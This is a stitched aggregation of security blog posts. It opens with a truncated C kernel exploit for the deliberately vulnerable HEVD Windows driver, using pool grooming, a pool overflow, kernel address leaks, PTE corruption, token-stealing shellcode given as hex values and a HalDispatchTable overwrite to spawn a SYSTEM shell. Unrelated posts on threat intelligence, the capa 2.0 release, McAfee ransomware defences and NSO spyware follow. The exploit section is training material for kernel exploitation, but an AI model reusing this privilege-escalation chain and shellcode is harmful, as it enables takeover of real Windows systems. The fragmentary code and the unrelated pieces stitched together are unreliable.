        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject1;

    printf("[+] Filled the new page with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");

// Free every other object in the global array to poke holes for the vulnerable objects
void pokeHoles(HANDLE driverHandle)
    // Bytes returned
    DWORD bytesreturnedPoke;

    // Free every other element in the global array managing objects in the new page from grooming
    for (int i = 0; i <= 5000; i += 2)

    printf("[+] Poked holes in the NonPagedPoolNx page containing the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");

// Create the main ARW_HELPER_OBJECT_IO
ARW_HELPER_OBJECT_IO createmainObject(HANDLE driverHandle)
    // Instantiate an object of type ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO helperObject = { 0 };

    // Set the Length member which corresponds to the amount of memory used to allocate a chunk to store the Name member eventually
    helperObject.Length = 0x8;

    // Bytes returned
    DWORD bytesReturned2;

    // Invoke CreateArbitraryReadWriteHelperObjectNonPagedPoolNx to create the main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX

    // Parse the output
    printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperObject.HelperObjectAddress);
    printf("[+] PARW_HELPER_OBJECT_IO->Name: 0x%p\n", helperObject.Name);
    printf("[+] PARW_HELPER_OBJECT_IO->Length: 0x%zu\n", helperObject.Length);

    return helperObject;

// Read/write primitive
void readwritePrimitive(HANDLE driverHandle)
    // Store the value of the base of HEVD
    unsigned long long hevdBase = memLeak(driverHandle);

    // Store the main ARW_HELOPER_OBJECT
    ARW_HELPER_OBJECT_IO mainObject = createmainObject(driverHandle);

    // Fill the holes

    // Groom the pool

    // Poke holes

    // Use buffer overflow to take "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name value (managed by ARW_HELPER_OBJECT_IO.Name) to overwrite any of the groomed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name values
    // Create a buffer that first fills up the vulnerable chunk of 0x10 (16) bytes
    unsigned long long vulnBuffer[5];
    vulnBuffer[0] = 0x4141414141414141;
    vulnBuffer[1] = 0x4141414141414141;

    // Hardcode the _POOL_HEADER value for a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object
    vulnBuffer[2] = 0x6b63614802020000;

    // Padding
    vulnBuffer[3] = 0x4141414141414141;

    // Overwrite any of the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name member with the address of the "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX (via ARW_HELPER_OBJECT_IO.HelperObjectAddress)
    vulnBuffer[4] = mainObject.HelperObjectAddress;

    // Bytes returned
    DWORD bytesreturnedOverflow;
    DWORD bytesreturnedreadPrimtitve;

    printf("[+] Triggering the out-of-bounds-write via pool overflow!\n");

    // Trigger the pool overflow

    // Find which "groomed" object was overflowed
    int index = 0;
    unsigned long long placeholder = 0x9090909090909090;

    // Loop through every groomed object to find out which Name member was overwritten with the main ARW_HELPER_NON_PAGED_POOL_NX object
    for (int i = 0; i <= 5000; i++)
        // The placeholder variable will be overwritten. Get operation will overwrite this variable with the real contents of each object's Name member
        helperobjectArray[i].Name = &placeholder;


        // Loop until a Name value other than the original NOPs is found
        if (placeholder != 0x9090909090909090)
            printf("[+] Found the overflowed object overwritten with main ARW_HELPER_NON_PAGED_POOL_NX object!\n");
            printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperobjectArray[i].HelperObjectAddress);

            // Assign the index
            index = i;

            printf("[+] Array index of global array managing groomed objects: %d\n", index);

            // Break the loop

    // IAT entry from HEVD.sys which points to nt!ExAllocatePoolWithTag
    unsigned long long ntiatLeak = hevdBase + 0x2038;

    // Print update
    printf("[+] Target HEVD.sys address with pointer to ntoskrnl.exe: 0x%llx\n", ntiatLeak);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &ntiatLeak;

    // Set the Name member of the "corrupted" object managed by the global array. The main object is currently set to the Name member of one of the sprayed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX that was corrupted via the pool overflow

    // Declare variable that will receive the address of nt!ExAllocatePoolWithTag and initialize it
    unsigned long long ntPointer = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the ntPointer variable. When the Name member is dereferenced and bubbled back up to user mode, it will overwrite the value of ntPointer
    mainObject.Name = &ntPointer;

    // Perform the "Get" operation on the main object, which should now have the Name member set to the IAT entry from HEVD

    // Print the pointer to nt!ExAllocatePoolWithTag
    printf("[+] Leaked ntoskrnl.exe pointer! nt!ExAllocatePoolWithTag: 0x%llx\n", ntPointer);

    // Assign a variable the base of the kernel (static offset)
    unsigned long long kernelBase = ntPointer - 0x9b3160;

    // Print the base of the kernel
    printf("[+] ntoskrnl.exe base address: 0x%llx\n", kernelBase);

    // Assign a variable with nt!MiGetPteAddress+0x13
    unsigned long long migetpteAddress = kernelBase + 0x222073;

    // Print update
    printf("[+] nt!MiGetPteAddress+0x13: 0x%llx\n", migetpteAddress);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &migetpteAddress;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the base of the PTEs

    // Declare a variable that will receive the base of the PTEs
    unsigned long long pteBase = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the pteBase variable
    mainObject.Name = &pteBase;

    // Perform the "Get" operation on the main object

    // Print update
    printf("[+] Base of the page table entries: 0x%llx\n", pteBase);

    // Calculate the PTE page for our shellcode in KUSER_SHARED_DATA
    unsigned long long shellcodePte = 0xfffff78000000800 >> 9;
    shellcodePte = shellcodePte & 0x7FFFFFFFF8;
    shellcodePte = shellcodePte + pteBase;

    // Print update
    printf("[+] KUSER_SHARED_DATA+0x800 PTE page: 0x%llx\n", shellcodePte);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &shellcodePte;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the address of the shellcode PTE page

    // Declare a variable that will receive the PTE bits
    unsigned long long pteBits = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &pteBits;

    // Perform the "Get" operation on the main object

    // Print update
    printf("[+] PTE bits for shellcode page: %p\n", pteBits);

    // Store nt!HalDispatchTable+0x8
    unsigned long long halTemp = kernelBase + 0xc00a68;

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &halTemp;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the pointer at nt!HalDispatchTable+0x8

    // Declare a variable that will receive [nt!HalDispatchTable+0x8]
    unsigned long long halDispatch = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &halDispatch;

    // Perform the "Get" operation on the main object

    // Print update
    printf("[+] Preserved [nt!HalDispatchTable+0x8] value: 0x%llx\n", halDispatch);

    // Arbitrary write primitive

        ; Windows 10 19H1 x64 Token Stealing Payload
        ; Author Connor McGarr
        [BITS 64]
            mov rax, [gs:0x188]       ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]     ; Current process (_EPROCESS)
            mov rbx, rax              ; Copy current process (_EPROCESS) to rbx
            mov rbx, [rbx + 0x448]    ; ActiveProcessLinks
            sub rbx, 0x448            ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x440]    ; UniqueProcessId (PID)
            cmp rcx, 4                ; Compare PID to SYSTEM PID
            jnz __loop                ; Loop until SYSTEM PID is found
            mov rcx, [rbx + 0x4b8]    ; SYSTEM token is @ offset _EPROCESS + 0x360
            and cl, 0xf0              ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x4b8], rcx    ; Copy SYSTEM token to current process
            xor rax, rax              ; set NTSTATUS STATUS_SUCCESS
            ret                       ; Done!

    // Shellcode
    unsigned long long shellcode[9] = { 0 };
    shellcode[0] = 0x00018825048B4865;
    shellcode[1] = 0x000000B8808B4800;
    shellcode[2] = 0x04489B8B48C38948;
    shellcode[3] = 0x000448EB81480000;
    shellcode[4] = 0x000004408B8B4800;
    shellcode[5] = 0x8B48E57504F98348;
    shellcode[6] = 0xF0E180000004B88B;
    shellcode[7] = 0x48000004B8888948;
    shellcode[8] = 0x0000000000C3C031;

    // Assign the target address to write to the corrupted object
    unsigned long long kusersharedData = 0xfffff78000000800;

    // Create a "counter" for writing the array of shellcode
    int counter = 0;

    // For loop to write the shellcode
    for (int i = 0; i <= 9; i++)
        // Setting the corrupted object to KUSER_SHARED_DATA+0x800 incrementally 9 times, since our shellcode is 9 QWORDS
        // kusersharedData variable, managing the current address of KUSER_SHARED_DATA+0x800, is incremented by 0x8 at the end of each iteration of the loop
        helperobjectArray[index].Name = &kusersharedData;

        // Setting the Name member of the main object to specify what we would like to write
        mainObject.Name = &shellcode[counter];

        // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800, incrementally

        // Perform the arbitrary write via "set" to overwrite each QWORD of KUSER_SHARED_DATA+0x800 until our shellcode is written

        // Increase the counter

        // Increase the counter
        kusersharedData += 0x8;

    // Print update
    printf("[+] Successfully wrote the shellcode to KUSER_SHARED_DATA+0x800!\n");

    // Taint the PTE contents to corrupt the NX bit in KUSER_SHARED_DATA+0x800
    unsigned long long taintedBits = pteBits & 0x0FFFFFFFFFFFFFFF;

    // Print update
    printf("[+] Tainted PTE contents: %p\n", taintedBits);

    // Leverage the arbitrary write primitive to corrupt the PTE contents

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &shellcodePte;

    // Specify what we would like to write (the tainted PTE contents)
    mainObject.Name = &taintedBits;

    // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800's PTE virtual address

    // Perform the arbitrary write

    // Print update
    printf("[+] Successfully corrupted the PTE of KUSER_SHARED_DATA+0x800! This region should now be marked as RWX!\n");

    // Leverage the arbitrary write primitive to overwrite nt!HalDispatchTable+0x8

    // Reset kusersharedData
    kusersharedData = 0xfffff78000000800;

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of KUSER_SHARED_DATA+0x800)
    mainObject.Name = &kusersharedData;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8

    // Perform the arbitrary write

    // Print update
    printf("[+] Successfully corrupted [nt!HalDispatchTable+0x8]!\n");

    // Locating nt!NtQueryIntervalProfile
    NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(

    // Error handling
    if (!NtQueryIntervalProfile)
        printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());

    // Print update for found ntdll!NtQueryIntervalProfile
    printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

    // Calling nt!NtQueryIntervalProfile
    ULONG exploit = 0;

    // Print update
    printf("[+] Successfully executed the shellcode!\n");

    // Leverage arbitrary write for restoration purposes

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of the preserved value at [nt!HalDispatchTable+0x8])
    mainObject.Name = &halDispatch;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8

    // Perform the arbitrary write

    // Print update
    printf("[+] Successfully restored [nt!HalDispatchTable+0x8]!\n");

    // Print update for NT AUTHORITY\SYSTEM shell
    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

    // Spawning an NT AUTHORITY\SYSTEM shell
    system("cmd.exe /c cmd.exe /K cd C:\\");

void main(void)
    // Open a handle to the driver
    printf("[+] Obtaining handle to HEVD.sys...\n");

    HANDLE drvHandle = CreateFileA(

    // Error handling
    if (drvHandle == (HANDLE)-1)
        printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());

An Overall Philosophy on the Use of Critical Threat Intelligence

16 July 2021 at 20:15

The overarching threat facing cyber organizations today is a highly skilled asymmetric enemy, well-funded and resolute in his task and purpose.   You never can exactly tell how they will come at you, but come they will.  It’s no different than fighting a kinetic foe in that, before you fight, you must choose your ground and study your enemy’s tendencies.

A lot of focus has been placed on tools and updating technology, but often we are pushed back on our heels and find ourselves fighting a defensive action.

But what if we change?  How do we do that?

The first step is to study the battlefield, understand what you’re trying to protect and lay down your protection strategy.  Pretty basic right??

Your technology strategy is very important, but you must embrace and create a thorough Cyber Threat Intelligence (CTI) doctrine which must take on many forms.

First, there is data, and lots of it.  However, the data must take specific forms to research and detect nascent elements where the adversary is attempting to catch you napping or give you the perception that the activity you see is normal.

As you pool this data, it must be segmented into layers and literally mapped to geographic locations across the globe.  The data is classified distinctly as malicious and reputations are applied.  This is a vital step in that it enables analytical programs, along with human intelligence analysts to apply the data within intelligence reports which themselves can take on many forms.

Once the data takes an analytic form, then it allows organizations to forensically piece together a picture of an attack.  This process is painstakingly tedious but necessary to understand your enemy and his tendencies.  Tools are useful, but it’s always the human in the loop that will recognize the tactical and strategic implications of an adversary’s moves. Once you see the picture, it becomes real, and then you’re able to prepare your enterprise for the conflict that follows.

Your early warning and sensing strategy must incorporate this philosophy.  You must sense, collect, exploit, process, produce and utilize each intelligence product that renders useful information.  It’s this process that will enable any organization to move decisively to and stay “left of boom”.

The McAfee Advanced Programs Group (APG) was created eight years ago to support intelligence organizations that embrace and maintain a strong CTI stance.  Its philosophy is to blend people, processes, data and a strong intelligence heritage to enable our customers to understand the cyber battlefield to proactively protect, but “maneuver” when necessary to avoid an attack.

APG applies three key disciplines or mission areas to provide this support.

First, we developed an internal tool called the Advanced Threat Landscape Analysis System (ATLAS).  This enables our organization to apply our malicious threat detections to a geospatial map display to see where we’re seeing malicious data.  ATLAS draws from our global network of billions of threat sensors to see trillions of detections each day, but enables our analysts to concentrate on the most malicious activity.  Then we’re better able to research and report accurate threat landscape information.

The second leg in the stool is our analytical staff, the true cyber ninjas that apply decades of experience supporting HUMINT operations across the globe and a well-established intelligence-based targeting philosophy to the cyber environment.  The result is a true understanding of the cyber battlefield enabling the leadership to make solid “intelligence-based” decisions.

Finally, the third leg is our ability to develop custom solutions and interfaces to adapt in a very custom way our ability to see and study data.  We have the ability to leverage 2.8 billion malicious detections, along with 20 other distinct malicious feeds, to correlate many different views, just not the McAfee view.  We interpret agnostically.

These three legs provide APG a powerful CTI advantage allowing our customers to adapt and respond to events by producing threat intelligence dynamically. When using this service it allows the customer to be fully situationally aware in a moments notice (visual command and control). Access to the data alone is an immense asset to any organization.  This allows each customer not only to know what their telemetry is, but also provides real time insights into the entire world ecosystem. Finally, the human analysis alone is immensely valuable.  It allows for the organizations to read and see/understand what it all means (the who, what, where and why).   “The so what!!”

The post An Overall Philosophy on the Use of Critical Threat Intelligence appeared first on McAfee Blog.

capa 2.0: Better, Faster, Stronger

19 July 2021 at 18:00

We are excited to announce version 2.0 of our open-source tool called capa. capa automatically identifies capabilities in programs using an extensible rule set. The tool supports both malware triage and deep dive reverse engineering. If you haven’t heard of capa before, or need a refresher, check out our first blog post. You can download capa 2.0 standalone binaries from the project’s release page and checkout the source code on GitHub.

capa 2.0 enables anyone to contribute rules more easily, which makes the existing ecosystem even more vibrant. This blog post details the following major improvements included in capa 2.0:

  • New features and enhancements for the capa explorer IDA Pro plugin, allowing you to interactively explore capabilities and write new rules without switching windows
  • More concise and relevant results via identification of library functions using FLIRT and the release of accompanying open-source FLIRT signatures
  • Hundreds of new rules describing additional malware capabilities, bringing the collection up to 579 total rules, with more than half associated with ATT&CK techniques
  • Migration to Python 3, to make it easier to integrate capa with other projects

capa explorer and Rule Generator

capa explorer is an IDAPython plugin that shows capa results directly within IDA Pro. The version 2.0 release includes many additions and improvements to the plugin, but we'd like to highlight the most exciting addition: capa explorer now helps you write new capa rules directly in IDA Pro!

Since we spend most of our time in reverse engineering tools such as IDA Pro analyzing malware, we decided to add a capa rule generator. Figure 1 shows the rule generator interface.

Figure 1: capa explorer rule generator interface

Once you’ve installed capa explorer using the Getting Started guide, open the plugin by navigating to Edit > Plugins > FLARE capa explorer. You can start using the rule generator by selecting the Rule Generator tab at the top of the capa explorer pane. From here, navigate your IDA Pro Disassembly view to the function containing a technique you'd like to capture and click the Analyze button. The rule generator will parse, format, and display all the capa features that it finds in your function. You can write your rule using the rule generator's three main panes: Features, Preview, and Editor. Your first step is to add features from the Features pane.

The Features pane is a tree view containing all the capa features extracted from your function. You can filter for specific features using the search bar at the top of the pane. Then, you can add features by double-clicking them. Figure 2 shows this in action.

Figure 2: capa explorer feature selection

As you add features from the Features pane, the rule generator automatically formats and adds them to the Preview and Editor panes. The Preview and Editor panes help you finesse the features that you've added and allow you to modify other information like the rule's metadata.

The Editor pane is an interactive tree view that displays the statement and feature hierarchy that forms your rule. You can reorder nodes using drag-and-drop and edit nodes via right-click context menus. To help humans understand the rule logic, you can add descriptions and comments to features by typing in the Description and Comment columns. The rule generator automatically formats any changes that you make in the Editor pane and adds them to the Preview pane. Figure 3 shows how to manipulate a rule using the Editor pane.

Figure 3: capa explorer editor pane

The Preview pane is an editable textbox containing the final rule text. You can edit any of the text displayed. The rule generator automatically formats any changes that you make in the Preview pane and adds them to the Editor pane. Figure 4 shows how to edit a rule directly in the Preview pane.

Figure 4: capa explorer preview pane

As you make edits the rule generator lints your rule and notifies you of any errors using messages displayed underneath the Preview pane. Once you've finished writing your rule you can save it to your capa rules directory by clicking the Save button. The rule generator saves exactly what is displayed in the Preview pane. It’s that simple!

We’ve found that using the capa explorer rule generator significantly reduces the amount of time spent writing new capa rules. This tool not only automates most of the rule writing process but also eliminates the need to context switch between IDA Pro and your favorite text editor allowing you to codify your malware knowledge while it’s fresh in your mind.

To learn more about capa explorer and the rule generator check out the README.

Library Function Identification Using FLIRT

As we wrote hundreds of capa rules and inspected thousands of capa results, we recognized that the tool sometimes shows distracting results due to embedded library code. We believe that capa needs to focus its attention on the programmer’s logic and ignore supporting library code. For example, highly optimized C/C++ runtime routines and open-source library code enable a programmer to quickly build a product but are not the product itself. Therefore, capa results should reflect the programmer’s intent for the program rather than a categorization of every byte in the program.

Compare the capa v1.6 results in Figure 5 versus capa v2.0 results in Figure 6. capa v2.0 identifies and skips almost 200 library functions and produces more relevant results.

Figure 5: capa v1.6 results without library code recognition

Figure 6: capa v2.0 results ignoring library code functions

So, we searched for a way to differentiate a programmer’s code from library code.

After experimenting with a few strategies, we landed upon the Fast Library Identification and Recognition Technology (FLIRT) developed by Hex-Rays. Notably, this technique has remained stable and effective since 1996, is fast, requires very limited code analysis, and enjoys a wide community in the IDA Pro userbase. We figured out how IDA Pro matches FLIRT signatures and re-implemented a matching engine in Rust with Python bindings. Then, we built an open-source signature set that covers many of the library routines encountered in modern malware. Finally, we updated capa to use the new signatures to guide its analysis.

capa uses these signatures to differentiate library code from a programmer’s code. While capa can extract and match against the names of embedded library functions, it will skip finding capabilities and behaviors within the library code. This way, capa results better reflect the logic written by a programmer.

Furthermore, library function identification drastically improves capa runtime performance: since capa skips processing of library functions, it can avoid the costly rule matching steps across a substantial percentage of real-world functions. Across our testbed of 206 samples, 28% of the 186,000 total functions are recognized as library code by our function signatures. As our implementation can recognize around 100,000 functions/sec, library function identification overhead is negligible and capa is approximately 25% faster than in 2020!

Finally, we introduced a new feature class that rule authors can use to match recognized library functions: function-name. This feature matches at the file-level scope. We’ve already started using this new capability to recognize specific implementations of cryptography routines, such as AES provided by Crypto++, as shown in the example rule in Figure 7.

Figure 7: Example rule using function-name to recognize AES via Crypto++

As we developed rules for interesting behaviors, we learned a lot about where uncommon techniques are used legitimately. For example, as malware analysts, we most commonly see the cpuid instruction alongside anti-analysis checks, such as in VM detection routines. Therefore, we naively crafted rules to flag this instruction. But, when we tested it against our testbed, the rule matched most modern programs because this instruction is often legitimately used in high-optimized routines, such as memcpy, to opt-in to newer CPU features. In hindsight, this is obvious, but at the time it was a little surprising to see cpuid in around 15% of all executables. With the new FLIRT support, capa recognizes the optimized memcpy routine embedded by Visual Studio and won’t flag the embedded cpuid instruction, as it's not part of the programmer’s code.

When a user upgrades to capa 2.0, they’ll see that the tool runs faster and provides more precise results.

Signature Generation

To provide the benefits of python-flirt to all users (especially those without an IDA Pro license) we have spent significant time to create a comprehensive FLIRT signature set for the common malware analysis use-case. The signatures come included with capa and are also available at our GitHub under the Apache 2.0 license. We believe that other projects can benefit greatly from this. For example, we expect the performance of FLOSS to improve once we’ve incorporated library function identification. Moreover, you can use our signatures with IDA Pro to recognize more library code.

Our initial signatures include:

  • From Microsoft Visual Studio (VS), for all major versions from VS6 to VS2019:
    • C and C++ run-time libraries
    • Active Template Library (ATL) and Microsoft Foundation Class (MFC) libraries
  • The following open-source projects as compiled with VS2015, VS2017, and VS2019:
    • CryptoPP
    • curl
    • Microsoft Detours
    • Mbed TLS (previously PolarSSL)
    • OpenSSL
    • zlib

Identifying and collecting the relevant library and object files took a lot of work. For the older VS versions this was done manually. For newer VS versions and the respective open-source projects we were able to automate the process using vcpgk and Docker.

We then used the IDA Pro FLAIR utilities to convert gigabytes of executable code into pattern files and then into signatures. This process required extensive research and much trial and error. For instance, we spent two weeks testing and exploring the various FLAIR options to understand the best combination. We appreciate Hex-Rays for providing high-quality signatures for IDA Pro and thank them for sharing their research and tools with the community.

To learn more about the pattern and signature file generation check out the siglib repository. The FLAIR utilities are available in the protected download area on Hex-Rays’ website.

Rule Updates

Since the initial release, the community has more than doubled the total capa rule count from 260 to over 570 capability detection rules! This means that capa recognizes many more techniques seen in real-world malware, certainly saving analysts time as they reverse engineer programs. And to reiterate, we’ve surfed a wave of support as almost 30 colleagues from a dozen organizations have volunteered their experience to develop these rules. Thank you!

Figure 8 provides a high-level overview of capabilities capa currently captures, including:

  • Host Interaction describes program functionality to interact with the file system, processes, and the registry
  • Anti-Analysis describes packers, Anti-VM, Anti-Debugging, and other related techniques
  • Collection describes functionality used to steal data such as credentials or credit card information
  • Data Manipulation describes capabilities to encrypt, decrypt, and hash data
  • Communication describes data transfer techniques such as HTTP, DNS, and TCP

Figure 8: Overview of capa rule categories

More than half of capa’s rules are associated with a MITRE ATT&CK technique including all techniques introduced in ATT&CK version 9 that lie within capa’s scope. Moreover, almost half of the capa rules are currently associated with a Malware Behavior Catalog (MBC) identifier.

For more than 70% of capa rules we have collected associated real-world binaries. Each binary implements interesting capabilities and exhibits noteworthy features. You can view the entire sample collection at our capa test files GitHub page. We rely heavily on these samples for developing and testing code enhancements and rule updates.

Python 3 Support

Finally, we’ve spent nearly three months migrating capa from Python 2.7 to Python 3. This involved working closely with vivisect and we would like to thank the team for their support. After extensive testing and a couple of releases supporting two Python versions, we’re excited that capa 2.0 and future versions will be Python 3 only.


Now that you’ve seen all the recent improvements to capa, we hope you’ll upgrade to the newest capa version right away! Thanks to library function identification capa will report faster and more relevant results. Hundreds of new rules capture the most interesting malware functionality while the improved capa explorer plugin helps you to focus your analysis and codify your malware knowledge while it’s fresh.

Standalone binaries for Windows, Mac, and Linux are available on the capa Releases page. To install capa from PyPi use the command pip install flare-capa. The source code is available at our capa GitHub page. The project page on GitHub contains detailed documentation, including thorough installation instructions and a walkthrough of capa explorer. Please use GitHub to ask questions, discuss ideas, and submit issues.

We highly encourage you to contribute to capa’s rule corpus. The improved IDA Pro plugin makes it easier than ever before. If you have any issues or ideas related to rules, please let us know on the GitHub repository. Remember, when you share a rule with the community, you scale your impact across hundreds of reverse engineers in dozens of organizations.

Fighting new Ransomware Techniques with McAfee’s Latest Innovations

20 July 2021 at 04:01

In 2021 ransomware attacks have been dominant among the bigger cyber security stories. Hence, I was not surprised to see that McAfee’s June 2021 Threat report is primarily focused on this topic.

This report provides a large range of statistics using the McAfee data lake behind MVISION Insights, including the Top MITRE ATT&CK Techniques. In this report I highlight the following MITRE techniques:

  1. Spear phishing links (Initial Access)
  2. Exploit public-facing applications (Initial Access)
  3. Windows Command Shell (Execution)
  4. User execution (Execution)
  5. Process Injection (Privilege escalation)
  6. Credentials from Web Browsers (Credential Access)
  7. Exfiltration to Cloud Storage (Exfiltration)

I also want to highlight one obvious technique which remains common across all ransomware attacks at the end of the attack lifecycle:

  1. Data encrypted for impact (Impact)

Traditional defences based on anti-malware signatures and web protection against known malicious domains and IP addresses can be insufficient to protect against these techniques. Therefore, for the rest of this article, I want to cover a few recent McAfee innovations which can make a big difference in the fight against ransomware.

Unified Cloud Edge with Remote Browser Isolation

The following three ransomware techniques are linked to web access:

  • Spear phishing links
  • User execution
  • Exfiltration to Cloud Storage

Moreover, most ransomware attacks require some form of access to a command-and-control server to be fully operational.

McAfee Remote Browser Isolation (RBI) ensures no malicious web content ever even reaches enterprise endpoints’ web browsers by isolating all browsing activity to unknown and risky websites into a remote virtual environment. With spear phishing links, RBI works best when running the mail client in the web browser. The user systems cannot be compromised if web code or files cannot run on them, making RBI the most powerful form of web threat protection available. RBI is included in most McAfee United Cloud Edge (UCE) licenses at no additional cost.

Figure 1. Concept of Remote Browser Isolation

McAfee Client Proxy (MCP) controls all web traffic, including ransomware web traffic initiated without a web browser by tools like MEGAsync and Rclone. MCP is part of McAfee United Cloud Edge (UCE).

Protection Against Fileless Attacks

The following ransomware techniques are linked to fileless attacks:

  • Windows Command Shell (Execution)
  • Process Injection (Privilege escalation)
  • User Execution (Execution)

Many ransomware attacks also use PowerShell.

Figure 2. Example of an attack kill chain with fileless

McAfee provides a large range of technologies which protect against fileless attack methods, including McAfee ENS (Endpoint Security) Exploit prevention and McAfee ENS 10.7 Adaptive Threat Protection (ATP). Here are few examples of Exploit Prevention and ATP rules:

  • Exploit 6113-6114-6115-6121 Fileless threat: self-injection
  • Exploit 6116-6117-6122: Mimikatz suspicious activity
  • ATP 316: Prevent PDF readers from starting cmd.exe
  • ATP 502: Prevent new services from being created via sc.exe or powershell.exe

Regarding the use on Mimikatz in the example above, the new McAfee ENS 10.7 ATP Credential Theft Protection is designed to cease attacks against Windows LSASS so that you do not need to rely on the detection of Mimikatz.

Figure 3. Example of Exploit Prevention rules related to Mimikatz

ENS 10.7 ATP is now included in most McAfee Endpoint Security licenses at no additional cost.

Proactive Monitoring and Hunting with MVISION EDR

To prevent initial access, you also need to reduce the risks linked to the following technique:

  • Exploit public facing applications (Initial Access)

For example, RDP (Windows Remote Desktop Protocol) is a common initial access used by ransomware attacks. You may have a policy that already prohibits or restricts RDP but how do you know it is enforced on every endpoint?

With MVISION EDR (Endpoint Detection and Response) you can perform a real time search across all managed systems to see what is happening right now.

Figure 4. MVISION EDR Real-time Search to verify if RDP is enabled or disabled on a system

Figure 5. MVISION EDR Real-time Search to identify systems with active connections on RDP

MVISION EDR maintains a history of network connections inbound and outbound from the client. Performing an historical search for network traffic could identify systems that actively communicated on port 3389 to unauthorized addresses, potentially detecting attempts at exploitation.

MVISION EDR also enables proactive monitoring by a security analyst. The Monitoring Dashboard helps the analyst in the SOC quickly triage suspicious behavior.

For more EDR use cases related to ransomware see this blog article.

Actionable Threat Intelligence

With MVISION Insights you do not need to wait for the latest McAfee Threat Report to be informed on the latest ransomware campaigns and threat profiles. With MVISION Insights you can easily meet the following use cases:

  • Proactively assess your organization’s exposure to ransomware and prescribe how to reduce the attack surface:
    • Detect whether you have been hit by a known ransomware campaign
    • Run a Cyber Threat Intelligence program despite a lack of time and expertise
    • Prioritize threat hunting using the most relevant indicators

These use cases are covered in the webinar How to fight Ransomware with the latest McAfee innovations.

Regarding the following technique from the McAfee June 2021 Threat Report:

Credentials from Web Browsers (Credential Access)

MVISION Insights can display the detections in your environment as well as prevalence statistics.

Figure 6. Prevalence statistics from MVISION Insights on the LAZAGNE tool

MVISION Insights is included in several Endpoint Security licenses.

Rollback of Ransomware Encryption

Now we are left with the last technique in the attack lifecycle:

  • Data encrypted for impact (Impact)

McAfee ENS 10.7 Adaptive Threat Protection (ATP) provides dynamic application containment of suspicious processes and enhanced remediation with an automatic rollback of the ransomware encryption.

Figure 7. Configuration of Rollback remediation in ENS 10.7

You can see how files impacted by ransomware can be restored through Enhanced Remediation in this video. For more best practices on tuning Dynamic Application Containment rules, check the knowledge base article here.

Additional McAfee Protection Against Ransomware

Last year McAfee released this blog article covering additional capabilities from McAfee Endpoint Security (ENS), Endpoint Detection and Response (EDR) and the Management Console (ePO) against ransomware including:

  • ENS Exploit prevention
  • ENS Firewall
  • ENS Web control
  • ENS Self protection
  • ENS Story Graph
  • ePO Protection workspace
  • Additional EDR use cases against ransomware


To increase your protection against ransomware you might already be entitled to:

  • ENS 10.7 Adaptive Threat Protection
  • Unified Cloud Edge with Remote Browser Isolation and McAfee Client Proxy
  • MVISION Insights

If you are, you should start using them as soon as possible, and if you are not, contact us.

The post Fighting new Ransomware Techniques with McAfee’s Latest Innovations appeared first on McAfee Blog.

NSO Exploits Still Remain Mysterious: ZecOps Can Help You Fight Back

19 July 2021 at 09:57
NSO Exploits Still Remain Mysterious: ZecOps Can Help You Fight Back

This weekend, the Guardian released a groundbreaking report that authoritarian governments have breached the mobile devices of human rights activists, journalists, and lawyers across the world, using a hacking software sold by NSO Group.

While the Guardian report contained new information regarding the targets of NSO customers and the Pegasus spyware, the specific mobile vulnerabilities that NSO leveraged were not identified and remain unpatched. This means that despite the public attribution, NSO tools remain just as powerful today as they were prior to the report.

Fight Back with ZecOps!

